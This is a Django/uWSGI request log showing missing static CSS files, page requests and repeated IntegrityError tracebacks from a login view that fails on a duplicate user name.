+[pid: 12823|app: 0|req: 886/1177] 219.228.146.225 () {38 vars in 885 bytes} [Tue Jan 12 05:02:25 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 887/1178] 219.228.146.225 () {38 vars in 877 bytes} [Tue Jan 12 05:02:25 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 888/1179] 219.228.146.225 () {38 vars in 841 bytes} [Tue Jan 12 05:02:25 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 889/1180] 219.228.146.225 () {38 vars in 861 bytes} [Tue Jan 12 05:02:25 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 890/1181] 219.228.146.225 () {38 vars in 861 bytes} [Tue Jan 12 05:02:25 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 891/1182] 219.228.146.225 () {38 vars in 809 bytes} [Tue Jan 12 05:02:25 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 892/1183] 219.228.146.225 () {38 vars in 807 bytes} [Tue Jan 12 05:02:25 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 893/1184] 219.228.146.225 () {38 vars in 917 bytes} [Tue Jan 12 05:02:25 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 894/1185] 219.228.146.225 () {40 vars in 869 bytes} [Tue Jan 12 05:02:29 2021] GET /announcement/ => generated 8250 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 895/1186] 219.228.146.225 () {38 vars in 874 bytes} [Tue Jan 12 05:02:29 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 896/1187] 219.228.146.225 () {38 vars in 886 bytes} [Tue Jan 12 05:02:29 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 897/1188] 219.228.146.225 () {38 vars in 878 bytes} [Tue Jan 12 05:02:29 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 898/1189] 219.228.146.225 () {38 vars in 842 bytes} [Tue Jan 12 05:02:29 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 899/1190] 219.228.146.225 () {38 vars in 862 bytes} [Tue Jan 12 05:02:29 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 900/1191] 219.228.146.225 () {38 vars in 918 bytes} [Tue Jan 12 05:02:29 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 901/1192] 219.228.146.225 () {38 vars in 810 bytes} [Tue Jan 12 05:02:29 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 902/1193] 219.228.146.225 () {38 vars in 808 bytes} [Tue Jan 12 05:02:29 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 903/1194] 219.228.146.225 () {38 vars in 862 bytes} [Tue Jan 12 05:02:29 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 904/1195] 219.228.146.225 () {40 vars in 866 bytes} [Tue Jan 12 05:02:30 2021] GET /admin-home/ => generated 9586 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 905/1196] 219.228.146.225 () {38 vars in 872 bytes} [Tue Jan 12 05:02:30 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 906/1197] 219.228.146.225 () {38 vars in 884 bytes} [Tue Jan 12 05:02:30 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 907/1198] 219.228.146.225 () {38 vars in 876 bytes} [Tue Jan 12 05:02:30 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 908/1199] 219.228.146.225 () {38 vars in 840 bytes} [Tue Jan 12 05:02:30 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 909/1200] 219.228.146.225 () {38 vars in 860 bytes} [Tue Jan 12 05:02:30 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 910/1201] 219.228.146.225 () {38 vars in 860 bytes} [Tue Jan 12 05:02:30 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 911/1202] 219.228.146.225 () {38 vars in 916 bytes} [Tue Jan 12 05:02:30 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 912/1203] 219.228.146.225 () {38 vars in 808 bytes} [Tue Jan 12 05:02:30 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 913/1204] 219.228.146.225 () {38 vars in 806 bytes} [Tue Jan 12 05:02:30 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 914/1205] 61.151.178.197 () {32 vars in 648 bytes} [Tue Jan 12 05:11:58 2021] GET /admin-home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 915/1206] 101.89.239.232 () {32 vars in 608 bytes} [Tue Jan 12 05:12:05 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 916/1207] 61.129.6.151 () {32 vars in 632 bytes} [Tue Jan 12 05:12:06 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 917/1208] 61.129.7.235 () {32 vars in 557 bytes} [Tue Jan 12 05:12:20 2021] GET /kind-manage => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 918/1209] 167.248.133.38 () {24 vars in 257 bytes} [Tue Jan 12 05:19:54 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 919/1210] 167.248.133.38 () {30 vars in 392 bytes} [Tue Jan 12 05:19:54 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 920/1211] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 05:26:05 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 921/1212] 219.228.146.225 () {38 vars in 789 bytes} [Tue Jan 12 05:36:58 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 922/1213] 219.228.146.225 () {36 vars in 677 bytes} [Tue Jan 12 05:38:45 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: -1|req: -1/1214] 219.228.146.225 () {38 vars in 776 bytes} [Tue Jan 12 05:38:45 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1215] 219.228.146.225 () {38 vars in 798 bytes} [Tue Jan 12 05:38:45 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1216] 219.228.146.225 () {38 vars in 780 bytes} [Tue Jan 12 05:38:45 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1217] 219.228.146.225 () {38 vars in 778 bytes} [Tue Jan 12 05:38:45 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1218] 219.228.146.225 () {38 vars in 759 bytes} [Tue Jan 12 05:38:45 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1219] 219.228.146.225 () {38 vars in 755 bytes} [Tue Jan 12 05:38:45 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1220] 219.228.146.225 () {38 vars in 773 bytes} [Tue Jan 12 05:38:45 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1221] 219.228.146.225 () {38 vars in 771 bytes} [Tue Jan 12 05:38:47 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1222] 219.228.146.225 () {38 vars in 764 bytes} [Tue Jan 12 05:38:47 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1223] 219.228.146.225 () {38 vars in 783 bytes} [Tue Jan 12 05:38:47 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1224] 219.228.146.225 () {38 vars in 829 bytes} [Tue Jan 12 05:38:48 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: 0|req: 923/1225] 219.228.146.225 () {48 vars in 960 bytes} [Tue Jan 12 05:43:02 2021] POST / => generated 82 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 165 bytes (2 switches on core 1)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 148, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 310, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 548, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 775, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 1156, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 725, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/protocol.py", line 221, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/err.py", line 143, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 154, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 148, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 310, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 548, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 775, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 1156, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 725, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/protocol.py", line 221, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/err.py", line 143, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'")
+[pid: 12823|app: 0|req: 924/1226] 219.228.146.225 () {48 vars in 960 bytes} [Tue Jan 12 05:43:08 2021] POST / => generated 208728 bytes in 166 msecs (HTTP/1.1 500) 6 headers in 187 bytes (2 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 148, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 310, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 548, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 775, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 1156, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 725, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/protocol.py", line 221, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/err.py", line 143, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 154, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 148, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 310, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 548, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 775, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 1156, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 725, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/protocol.py", line 221, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/err.py", line 143, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'")
+[pid: 12823|app: 0|req: 925/1227] 219.228.146.225 () {48 vars in 960 bytes} [Tue Jan 12 05:43:09 2021] POST / => generated 208728 bytes in 57 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 148, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 310, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 548, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 775, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 1156, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 725, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/protocol.py", line 221, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/err.py", line 143, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 154, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
